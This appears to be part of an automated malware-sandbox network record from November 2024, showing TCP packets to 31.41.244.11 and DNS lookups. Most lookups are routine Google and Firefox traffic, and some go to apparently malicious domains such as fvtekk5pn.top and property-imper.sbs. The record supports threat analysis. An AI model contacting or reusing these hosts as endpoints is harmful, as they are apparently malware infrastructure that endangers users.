Nov 22, 2024 20:36:11.798346043 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.799540043 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.799591064 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.799695015 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.799736977 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.800796032 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.800841093 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.800894976 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.800935030 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.802118063 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.802201986 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.802248001 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.802293062 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.803376913 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.803423882 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.803483009 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.803531885 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.804635048 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.804682016 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.947701931 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.947787046 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.947794914 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.947829008 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.948056936 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.948098898 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.948179007 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.948227882 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.949336052 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.949384928 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.949450970 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.949497938 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.950632095 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.950731993 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.950752974 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.950797081 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.951941967 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.951983929 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.952032089 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.952075005 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.953255892 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.953305006 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.953346014 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.953389883 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.954560041 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.954606056 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.954698086 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.954744101 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976042032 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976105928 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976178885 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976233006 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976236105 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976274014 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976408005 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976450920 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976473093 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976516008 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976541996 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976583958 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976605892 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976649046 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976655006 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976696014 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976705074 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976743937 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976769924 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976813078 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976818085 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976855040 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976865053 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976907969 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.976929903 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976977110 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.976977110 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977021933 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977025032 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977065086 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977072001 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977111101 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977118969 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977161884 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977165937 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977200985 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977212906 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977252960 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977260113 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977303028 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977313042 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977349997 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977360964 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977400064 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977406979 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977451086 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977453947 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977498055 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977502108 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977549076 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977550030 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977591038 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977596045 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977637053 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977643013 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977684021 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977686882 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977730036 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977734089 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977777004 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977780104 CET	80	49794	31.41.244.11	192.168.2.4
Nov 22, 2024 20:36:11.977823973 CET	49794	80	192.168.2.4	31.41.244.11
Nov 22, 2024 20:36:11.977826118 CET	80	49794	31.41.244.11	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2024 20:35:10.262012005 CET	192.168.2.4	1.1.1.1	0x6235	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:35:10.262300014 CET	192.168.2.4	1.1.1.1	0x318	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 22, 2024 20:35:17.312848091 CET	192.168.2.4	1.1.1.1	0xe3ad	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:35:17.313074112 CET	192.168.2.4	1.1.1.1	0xdb5d	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 22, 2024 20:36:20.802426100 CET	192.168.2.4	1.1.1.1	0x7ba4	Standard query (0)	home.fvtekk5pn.top	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:20.802508116 CET	192.168.2.4	1.1.1.1	0x9c44	Standard query (0)	home.fvtekk5pn.top	28	IN (0x0001)	false
Nov 22, 2024 20:36:31.040994883 CET	192.168.2.4	1.1.1.1	0xc826	Standard query (0)	property-imper.sbs	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:47.498476028 CET	192.168.2.4	1.1.1.1	0xc746	Standard query (0)	fvtekk5pn.top	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:47.498601913 CET	192.168.2.4	1.1.1.1	0x3984	Standard query (0)	fvtekk5pn.top	28	IN (0x0001)	false
Nov 22, 2024 20:36:50.423938036 CET	192.168.2.4	1.1.1.1	0xb93d	Standard query (0)	fvtekk5pn.top	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:50.424017906 CET	192.168.2.4	1.1.1.1	0xc203	Standard query (0)	fvtekk5pn.top	28	IN (0x0001)	false
Nov 22, 2024 20:36:52.230551958 CET	192.168.2.4	1.1.1.1	0x5ab0	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:52.404804945 CET	192.168.2.4	1.1.1.1	0xd845	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:36:57.921231985 CET	192.168.2.4	1.1.1.1	0xa9d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:57.921379089 CET	192.168.2.4	1.1.1.1	0xfa47	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 22, 2024 20:37:00.725033998 CET	192.168.2.4	1.1.1.1	0xefa2	Standard query (0)	fvtekk5pn.top	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:00.725145102 CET	192.168.2.4	1.1.1.1	0xee45	Standard query (0)	fvtekk5pn.top	28	IN (0x0001)	false
Nov 22, 2024 20:37:07.246608019 CET	192.168.2.4	1.1.1.1	0x3780	Standard query (0)	prod.classify-client.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:07.597058058 CET	192.168.2.4	1.1.1.1	0x7036	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.597507000 CET	192.168.2.4	1.1.1.1	0x1dea	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.738888979 CET	192.168.2.4	1.1.1.1	0xdae3	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.777096987 CET	192.168.2.4	1.1.1.1	0xec5c	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.821959019 CET	192.168.2.4	1.1.1.1	0x4696	Standard query (0)	spocs.getpocket.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.877887011 CET	192.168.2.4	1.1.1.1	0x8638	Standard query (0)	contile.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.946557045 CET	192.168.2.4	1.1.1.1	0xb38c	Standard query (0)	content-signature-2.cdn.mozilla.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.962008953 CET	192.168.2.4	1.1.1.1	0x83a5	Standard query (0)	youtube.com	28	IN (0x0001)	false
Nov 22, 2024 20:37:08.038921118 CET	192.168.2.4	1.1.1.1	0x91da	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.092149019 CET	192.168.2.4	1.1.1.1	0xc95c	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Nov 22, 2024 20:37:08.125895023 CET	192.168.2.4	1.1.1.1	0xad7a	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.152467966 CET	192.168.2.4	1.1.1.1	0xa21f	Standard query (0)	shavar.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.211277008 CET	192.168.2.4	1.1.1.1	0x902e	Standard query (0)	prod.detectportal.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:08.271513939 CET	192.168.2.4	1.1.1.1	0xa5a9	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.275129080 CET	192.168.2.4	1.1.1.1	0x528c	Standard query (0)	prod.content-signature-chains.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:08.280344963 CET	192.168.2.4	1.1.1.1	0x80a8	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.413099051 CET	192.168.2.4	1.1.1.1	0x925b	Standard query (0)	firefox.settings.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.480396986 CET	192.168.2.4	1.1.1.1	0x74c7	Standard query (0)	push.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.547377110 CET	192.168.2.4	1.1.1.1	0x7247	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:08.645230055 CET	192.168.2.4	1.1.1.1	0x2ce8	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false
Nov 22, 2024 20:37:08.685627937 CET	192.168.2.4	1.1.1.1	0x70a8	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.818080902 CET	192.168.2.4	1.1.1.1	0x26cb	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.851715088 CET	192.168.2.4	1.1.1.1	0xc0e3	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:08.981699944 CET	192.168.2.4	1.1.1.1	0x8e11	Standard query (0)	prod.remote-settings.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:09.357619047 CET	192.168.2.4	1.1.1.1	0xa4f	Standard query (0)	example.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.357949018 CET	192.168.2.4	1.1.1.1	0x4cd3	Standard query (0)	ipv4only.arpa	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.359586954 CET	192.168.2.4	1.1.1.1	0x4954	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.620450974 CET	192.168.2.4	1.1.1.1	0xe05f	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.760835886 CET	192.168.2.4	1.1.1.1	0xd008	Standard query (0)	telemetry-incoming.r53-2.services.mozilla.com	28	IN (0x0001)	false
Nov 22, 2024 20:37:11.546219110 CET	192.168.2.4	1.1.1.1	0xeac5	Standard query (0)	support.mozilla.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:11.686772108 CET	192.168.2.4	1.1.1.1	0xb6d5	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:11.826697111 CET	192.168.2.4	1.1.1.1	0xdacc	Standard query (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:12.110282898 CET	192.168.2.4	1.1.1.1	0xba2d	Standard query (0)	www.youtube.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.110364914 CET	192.168.2.4	1.1.1.1	0x1c8a	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.171118975 CET	192.168.2.4	1.1.1.1	0x521a	Standard query (0)	www.wikipedia.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.256565094 CET	192.168.2.4	1.1.1.1	0x252f	Standard query (0)	youtube-ui.l.google.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.257360935 CET	192.168.2.4	1.1.1.1	0x5246	Standard query (0)	star-mini.c10r.facebook.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.472630978 CET	192.168.2.4	1.1.1.1	0x9df9	Standard query (0)	youtube-ui.l.google.com	28	IN (0x0001)	false
Nov 22, 2024 20:37:12.473139048 CET	192.168.2.4	1.1.1.1	0xa692	Standard query (0)	star-mini.c10r.facebook.com	28	IN (0x0001)	false
Nov 22, 2024 20:37:12.476445913 CET	192.168.2.4	1.1.1.1	0x4a30	Standard query (0)	dyna.wikimedia.org	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.613564968 CET	192.168.2.4	1.1.1.1	0x4797	Standard query (0)	www.reddit.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.615894079 CET	192.168.2.4	1.1.1.1	0x8d12	Standard query (0)	dyna.wikimedia.org	28	IN (0x0001)	false
Nov 22, 2024 20:37:12.616504908 CET	192.168.2.4	1.1.1.1	0x4e32	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.759818077 CET	192.168.2.4	1.1.1.1	0x29b4	Standard query (0)	reddit.map.fastly.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.871989965 CET	192.168.2.4	1.1.1.1	0x4e32	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.951839924 CET	192.168.2.4	1.1.1.1	0x91e5	Standard query (0)	twitter.com	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:12.960251093 CET	192.168.2.4	1.1.1.1	0x7a83	Standard query (0)	reddit.map.fastly.net	28	IN (0x0001)	false
Nov 22, 2024 20:37:13.093749046 CET	192.168.2.4	1.1.1.1	0xc042	Standard query (0)	twitter.com	28	IN (0x0001)	false
Nov 22, 2024 20:37:14.788850069 CET	192.168.2.4	1.1.1.1	0x124e	Standard query (0)	push.services.mozilla.com	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 22, 2024 20:35:10.402519941 CET	1.1.1.1	192.168.2.4	0x6235	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:35:10.402558088 CET	1.1.1.1	192.168.2.4	0x318	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 22, 2024 20:35:17.468791962 CET	1.1.1.1	192.168.2.4	0xdb5d	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:35:17.473014116 CET	1.1.1.1	192.168.2.4	0xe3ad	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:35:17.473014116 CET	1.1.1.1	192.168.2.4	0xe3ad	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:21.641334057 CET	1.1.1.1	192.168.2.4	0x7ba4	No error (0)	home.fvtekk5pn.top		34.116.198.130	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:31.190604925 CET	1.1.1.1	192.168.2.4	0xc826	No error (0)	property-imper.sbs		172.67.162.84	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:31.190604925 CET	1.1.1.1	192.168.2.4	0xc826	No error (0)	property-imper.sbs		104.21.33.116	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:47.802542925 CET	1.1.1.1	192.168.2.4	0xc746	No error (0)	fvtekk5pn.top		34.116.198.130	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:50.707717896 CET	1.1.1.1	192.168.2.4	0xb93d	No error (0)	fvtekk5pn.top		34.116.198.130	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:52.216206074 CET	1.1.1.1	192.168.2.4	0xdd76	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:52.370925903 CET	1.1.1.1	192.168.2.4	0x5ab0	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:58.057838917 CET	1.1.1.1	192.168.2.4	0xa9d	No error (0)	www.google.com		142.250.181.100	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:36:58.058202028 CET	1.1.1.1	192.168.2.4	0xfa47	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 22, 2024 20:37:00.864617109 CET	1.1.1.1	192.168.2.4	0xefa2	No error (0)	fvtekk5pn.top		34.116.198.130	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.734625101 CET	1.1.1.1	192.168.2.4	0x7036	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.876542091 CET	1.1.1.1	192.168.2.4	0xdae3	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:07.915465117 CET	1.1.1.1	192.168.2.4	0xec5c	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.015389919 CET	1.1.1.1	192.168.2.4	0x8638	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.024599075 CET	1.1.1.1	192.168.2.4	0x1dea	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.024599075 CET	1.1.1.1	192.168.2.4	0x1dea	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.090112925 CET	1.1.1.1	192.168.2.4	0xb38c	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.090112925 CET	1.1.1.1	192.168.2.4	0xb38c	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.090112925 CET	1.1.1.1	192.168.2.4	0xb38c	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.099844933 CET	1.1.1.1	192.168.2.4	0x83a5	No error (0)	youtube.com			28	IN (0x0001)	false
Nov 22, 2024 20:37:08.176523924 CET	1.1.1.1	192.168.2.4	0x91da	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.250865936 CET	1.1.1.1	192.168.2.4	0x7c29	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.250865936 CET	1.1.1.1	192.168.2.4	0x7c29	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.270771980 CET	1.1.1.1	192.168.2.4	0xad7a	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.295020103 CET	1.1.1.1	192.168.2.4	0xa21f	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.350114107 CET	1.1.1.1	192.168.2.4	0x902e	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Nov 22, 2024 20:37:08.413011074 CET	1.1.1.1	192.168.2.4	0xa5a9	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.416158915 CET	1.1.1.1	192.168.2.4	0x528c	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Nov 22, 2024 20:37:08.503433943 CET	1.1.1.1	192.168.2.4	0x4696	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.503433943 CET	1.1.1.1	192.168.2.4	0x4696	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.511674881 CET	1.1.1.1	192.168.2.4	0x80a8	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.550964117 CET	1.1.1.1	192.168.2.4	0x925b	No error (0)	firefox.settings.services.mozilla.com	prod.remote-settings.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.550964117 CET	1.1.1.1	192.168.2.4	0x925b	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.584170103 CET	1.1.1.1	192.168.2.4	0xe8e2	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:08.584170103 CET	1.1.1.1	192.168.2.4	0xe8e2	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.619678020 CET	1.1.1.1	192.168.2.4	0x74c7	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.822532892 CET	1.1.1.1	192.168.2.4	0x70a8	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:08.960419893 CET	1.1.1.1	192.168.2.4	0x26cb	No error (0)	prod.remote-settings.prod.webservices.mozgcp.net		34.149.100.209	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.500906944 CET	1.1.1.1	192.168.2.4	0x4cd3	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.500906944 CET	1.1.1.1	192.168.2.4	0x4cd3	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.502136946 CET	1.1.1.1	192.168.2.4	0xa4f	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Nov 22, 2024 20:37:09.503264904 CET	1.1.1.1	192.168.2.4	0x4954	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 22, 2024 20:37:09.503264904 CET	1.1.1.1	192.168.2.4	0x4954	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
